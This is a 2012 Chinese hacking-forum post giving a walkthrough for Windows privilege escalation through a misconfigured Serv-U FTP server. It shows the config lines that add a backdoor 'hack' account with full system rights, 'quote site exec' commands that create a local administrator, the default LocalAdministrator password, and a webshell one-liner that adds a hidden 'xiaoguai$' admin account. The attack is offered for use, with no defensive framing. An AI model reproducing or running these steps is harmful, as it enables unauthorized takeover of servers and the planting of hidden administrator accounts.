切换风格

Wizard Sky California Sunset glow Black Cloud Beige Dragon Lavender NewYear City Snow Flowers London
收藏本站XSS平台字符串转换jsfuck
289 windows提权的基本内容---Serv-U提权[复制链接]
发表于 2012-10-7 22:20:28 | 显示全部楼层 |!read_mode!
Serv-U 提权
在 Windows 下,有些管理员用的 FTP 并不是 Windows 自带的 ftp。


我们可以用 Windows 的 ftp 命令,来踩个点,获取信息是 Serv-U V6.4。
很大几率可以提权,跟着我们来找 Serv-U 的安装目录
一般情况是 系统盘:\Program Files\RhinoSoft.com\Serv-U 或 系统盘:\Program Files\Serv-U,
一般情况下安装在系统盘是只有可读权限,没有可写权限的。
我这里测试是安装在 E 盘,由于配置不恰当导致可以写。


接着打开 Serv-u 所在的目录
e:\Program Files\RhinoSoft.com\Serv-U
找到配置文件 e:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini


接着在
[Domain1]
User1=asp|1|0
User2=php|1|0
User3=test|1|0
下面添加一个
User4=hack|1|0
接着把滚动条移到最下面继续添加配置

[USER=hack|1]
Password=xgbab6e28dbdacfa2f7c9c8b9375de91ca
HomeDir=c:\
PasswordLastChange=1275296180
TimeOut=600
Note1="Wizard generated account"
Maintenance=System
Access1=c:\|RWAMELCDP
Domain1=192.168.1.97||21|a|1|0|0
RWAMELCDP //完全控制权限
Maintenance=System //权限类型多加一行指定新加帐号为系统管理员
Access1=c: 管理路径
Domain1 ip。
ReloadSettings=True //在修改in i 文件后需加入此项,这时SERV-U 会自动刷新配置文件
并生效,此项随之消失.再有修改再次添加


保存文件立即生效
ftp 帐号 hack 密码 hack。然后 FTP 连接上去执行
quote site exec net user helen fuckhelen /add
quote site exec net localgroup administrators helen /add


执行成功后会返回 200 exec command successful <Tid=33>
如果碰到修改不了的情况下,还有一种更傻瓜的方法,就是用 webshell 自带的来提权,他的
思路就是 webshell 登录 serv-u 的最高权限用户:LocalAdministrator 默认密码是:
#l@$ak#.lk;0@P


点击 Serv-u 提权,然后默认 webshell 下已经输入好了,命令填
cmd /c net user xiaoguai$ 123456 /add&net localgroup administrators xiaoguai$ /add
就会创建 xiaoguai$ 帐号和添加进 administrator 组去了.
end



附件: 你需要登录才可以下载或查看附件。没有帐号?加入Team
操千曲而后晓声,观千剑而后识器。

代码区

GMT+8, 2020-10-2 05:25

Powered by Discuz! X2

© 2001-2018 Comsenz Inc.

回顶部